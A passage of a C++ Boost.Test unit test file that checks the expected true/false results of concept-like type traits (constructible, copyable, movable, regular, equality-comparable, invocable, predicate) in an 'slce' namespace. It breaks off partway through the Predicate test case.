BOOST_CHECK_EQUAL( ( slce::is_destructible< constructible_with_int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< const constructible_with_int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< volatile constructible_with_int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< constructible_with_int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_destructible< constructible_with_int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Constructible) {
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const default_constructible, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile default_constructible, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible&, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< default_constructible*, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int&, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< int*, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< const constructible_with_int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< volatile constructible_with_int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int&, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_constructible< constructible_with_int*, int >::value ), false );
}
BOOST_AUTO_TEST_CASE(DefaultConstructible) {
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< const default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< volatile default_constructible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< default_constructible& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< default_constructible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< const constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< volatile constructible_with_int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< constructible_with_int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_default_constructible< constructible_with_int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(CopyConstructible) {
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< non_copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< volatile movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< movable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copy_constructible< movable* >::value ), true );
}
BOOST_AUTO_TEST_CASE(MoveConstructible) {
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< int* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< non_copyable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< volatile movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< movable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_move_constructible< movable* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Boolean) {
BOOST_CHECK_EQUAL( ( slce::is_boolean< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< base* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const bool >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile bool >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool_like >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< const bool_like >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< volatile bool_like >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool_like& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_boolean< bool_like* >::value ), false );
}
BOOST_AUTO_TEST_CASE(EqualityComparable) {
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable_inconvertible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< comparable_inconvertible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< partially_comparable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< partially_comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(EqualityComparableWith) {
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< const comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< volatile comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable&, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable*, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable_inconvertible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable_inconvertible, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, comparable_convertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable_convertible, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< incomparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< comparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< incomparable, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< const int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< volatile int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int&, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_equality_comparable_with< int*, int >::value ), false );
}
BOOST_AUTO_TEST_CASE(StrictTotallyOrdered) {
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile comparable_inconvertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable_inconvertible& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< comparable_inconvertible* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile partially_comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< partially_comparable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< partially_comparable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(StrictTotallyOrderedWith) {
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, const comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, volatile comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< const comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< volatile comparable, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable&, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable*, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable_inconvertible >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable_inconvertible, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, comparable_convertible >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable_convertible, comparable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< incomparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< comparable, incomparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< incomparable, comparable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, const int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, int& >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int, int* >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< const int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< volatile int, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int&, int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_strict_totally_ordered_with< int*, int >::value ), false );
}
BOOST_AUTO_TEST_CASE(Movable) {
BOOST_CHECK_EQUAL( ( slce::is_movable< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_movable< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_movable< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< movable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_movable< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_movable< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_movable< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Copyable) {
BOOST_CHECK_EQUAL( ( slce::is_copyable< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_copyable< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< copyable >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_copyable< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_copyable< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_copyable< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_copyable< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Semiregular) {
BOOST_CHECK_EQUAL( ( slce::is_semiregular< base >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_semiregular< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_semiregular< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_semiregular< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_semiregular< int* >::value ), true );
}
BOOST_AUTO_TEST_CASE(Regular) {
BOOST_CHECK_EQUAL( ( slce::is_regular< base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile base >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_regular< base& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< base* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile copyable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_regular< copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const movable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile movable >::value ), false ); //
BOOST_CHECK_EQUAL( ( slce::is_regular< movable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< movable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< const non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile non_copyable >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< non_copyable& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< non_copyable* >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< const int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< volatile int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular< int& >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular< int* >::value ), true );
}
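// Without __cpp_lib_invoke the Invocable, RegularInvocable, Predicate, Relation and
// StrictWeakOrder traits below are all expected to report false.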
BOOST_AUTO_TEST_CASE(Invocable) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)() >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ), int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int, int >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_invocable< callable, int, int >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(RegularInvocable) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)() >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ), int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int, int >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_regular_invocable< callable, int, int >::value ), false );
#endif
}
BOOST_AUTO_TEST_CASE(Predicate) {
#ifdef __cpp_lib_invoke
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ), int >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< callable, int, int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< predicate, base, other >::value ), true );
BOOST_CHECK_EQUAL( ( slce::is_predicate< relation, base, other >::value ), true );
#else
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)() >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)(), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< void(*)( int ), int >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ) >::value ), false );
BOOST_CHECK_EQUAL( ( slce::is_predicate< bool(*)( int ), int >::value ), false );
